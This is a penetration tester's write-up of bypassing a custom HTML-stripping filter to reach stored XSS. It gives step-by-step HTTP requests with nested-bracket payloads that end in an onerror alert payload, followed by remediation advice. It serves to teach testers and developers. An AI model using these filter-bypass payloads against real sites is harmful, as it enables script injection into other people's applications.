Parsing And Filtering HTML To Prevent XSS Is Difficult

By: Colin Murdoch

Typically when an XSS vulnerability is detected, the remediation efforts stem around sanitizing data on input where appropriate, as well as properly escaping data on server output based on the context it will be used in. While it may appear that sanitizing data on input is sufficient, any small mistake in the parsing logic can still leave the application wide open to XSS vulnerabilities. Ultimately, sanitization of inputs should be used for defining business logic, while sanitizing or escaping data on egress should be used to eliminate the XSS potential.

In a recent engagement, the above scenario occurred and almost resulted in a vulnerable remediation effort being marked as successful, when in fact a complicated input chain could still result in XSS. This should be a reminder that any time the observable output from a server function has any strange quirks or behaviours with inputs, further probing may lead to successful exploitation. In this case, the client was notified their remediation efforts were still faulty, allowing them to implement a proper fix.

The overall process of fuzzing the input will be described below, where odd quirks in the output are highlighted which can help to identify potentially vulnerable endpoints. It should be noted that there exists further complexity in this specific scenario, as the injection point (‘/api/store’) was filtered once when the input was sent, and filtered again on the vulnerable endpoint (‘/upload/view’).

## Step 1: Initial Fuzzing

The initial fuzzing process involves sending a simple payload with basic HTML markup and small mutations to identify how the application responds. The payload will use the characters ‘$$’ as a prefix and ‘##’ as a suffix to help determine how content is filtered by the server. Note that the payloads below are not correctly escaped for easier reading, but URI encoding should normally be performed:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded
Content-Length: 33

vulnerable_field=$$<b>hello</b>##

After sending this request, it was observed that the ‘vulnerable_field’ was returned with the value ‘$$hello##’. It appears that any HTML tags are simply stripped, only leaving the inner content. What happens if the payload is prefixed with an extra ‘<‘?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded
Content-Length: 34

vulnerable_field=$$<<b>hello</b>##

The ‘vulnerable_field’ was now set to the value ‘$$’. Based on this, it would appear that the server is likely keeping count of each ‘<‘ and ‘>’ bracket is observed, and excludes all content in the middle. Since there’s an extra ‘<‘ with no matching ‘>’, the entire payload and prefix is removed. This seems like it isn’t possible to actually write HTML tags anymore, so there’s no chance of XSS, right? Can the parser be confused by adding the closing ‘>’ bracket before the first opening ‘<‘ bracket?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded
Content-Length: 35

vulnerable_field=$$><<b>hello</b>##

Now the ‘vulnerable_field’ returns the value ‘$$>’, so things aren’t looking very great. Everything after the first ‘<‘ is still removed due to no matching ‘>’ bracket in the payload. The server seems to be keeping correct track of when and where a bracket is encountered, which still prevents the injection of valid HTML content. What happens if an empty ‘<>’ is sent to the server?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded

Content-Length: 28

vulnerable_field=$$<>hello##

The ‘vulnerable_field’ now returns the value ‘$$<>hello##’, which does make this a little more interesting. HTML injection may be possible, as both the ‘<‘ and ‘>’ characters can be output in succession. While there are still challenges to overcome to actually inject content between the tags, it’s worth pursuing. Ideally, the server can be tricked to strip out a chunk of data, and leave behind a valid HTML artefact.

Further pursuing this, what happens if a large amount of consecutive ‘<‘ tags are sent, followed by a large amount of consecutive ‘b>’ values? The idea here being that the ‘<b>’ in the middle is stripped, but this leaves behind another ‘<b>’, and so-on. Will the parser get confused and accidentally miss an element?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded
Content-Length: 41

vulnerable_field=$$<<<<<b>b>b>b>b>hello##

The ‘vulnerable_field’ returns the value ‘$$<<<b>b>b>hello##’! While this is not very well-formed, a successful ‘<b>’ element was injected.

## Step 2: Creating The POC

It appears that as long as the depth of injected payloads is 3 or more, HTML tags can be injected into the value. The next payload will clean up the input to inject a proper bold ‘hello’:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded
Content-Length: 47

vulnerable_field=$$<<<b>b>b>hello<<</b>/b>/b>##

This results in the ‘vulnerable_field’ saved as ‘$$<b>hello</b>##’. Successful HTML injection! Unfortunately, once browsing to the ‘/upload/view’ endpoint to trigger the actual XSS, the page only output the content ‘$$hello##’. The content was going through another round of filtering when being viewed in the vulnerable location. The solution is rather simple, though looks quite complex as a payload; the payload must encode itself a second time, such that the initial vulnerable payload is stored. However, due to a slightly different parsing in the second stage, it is necessary for the server to output the value ‘$$<<<<b><b>hello<<<<b></b>##’, which would then cause the second stage of parsing to produce the value ‘$$<b>hello</b>##’. This can be performed with the following payload:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded
Content-Length: 69

vulnerable_field=$$<<<<<<b>b>b><<<b>b>b>hello<<<<<<b>b>b><<<b>b>/b>##

Now, the ‘vulnerable_field’ is scrubbed and ultimately saved to ‘$$<<<<b><b>hello<<<<b></b>##’ as expected. Once the page ‘/upload/view’ is viewed, another round of filtering is performed and the page outputs the content ‘$$<b>hello</b>##’, resulting in a bolded ‘hello’.

## Step 3: Weaponized Payload

To fully demonstrate that the XSS was capable, the classic ‘alert(1)’ payload will be injected next using an invalid ‘<img>’ object, with the stored value saved as ‘<<<<b><img src=1 onerror=alert(1)>’:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-url-formencoded
Content-Length: 63

vulnerable_field=<<<<<<b>b>b><<<b>b>img src=1 onerror=alert(1)>><

Finally, browsing to the vulnerable ‘/upload/view’ page triggers the stored XSS vulnerability, triggering an alert value on the page:
![XSS Alert]

Hopefully this is a good lesson for penetration testers on the importance of perseverence when noticing that a backend server behaves strange with certain inputs, even if it’s not immediately exploitable. With some time and a clever enough payload, exploitation is often possible.

From a developer perspective, this goes to show that simple tests which satisfy remediation efforts may not always be enough, and therefore custom solutions to well-solved problems may not be the best answer. Using standard frameworks and properly escaping all user-controlled data for the correct output context such that it is always treated as data and never as code will prevent XSS and ensure your applications remain safe.

Finally, the simplest input sanitization or validation solutions may sometimes be the best. Rather than creating complex parsers that attempt to strip away custom patterns with multiple different implementations, it’s often easier to create a whitelist (or blacklist) of characters and check the input for any violations. When a violation is detected, either strip the character or reject the request entirely, forcing the user to submit only valid data. This approach only require a single pass on the input data, and ensures any potentially dangerous character will never be ingested. Attributes and other forms of metadata abstractions can define the rules and be applied at the data source, ensuring validation logic is only written once in the source code. It’s more performant, forces the definition of business requirements across all data points, and ultimately leads to more robust application designs.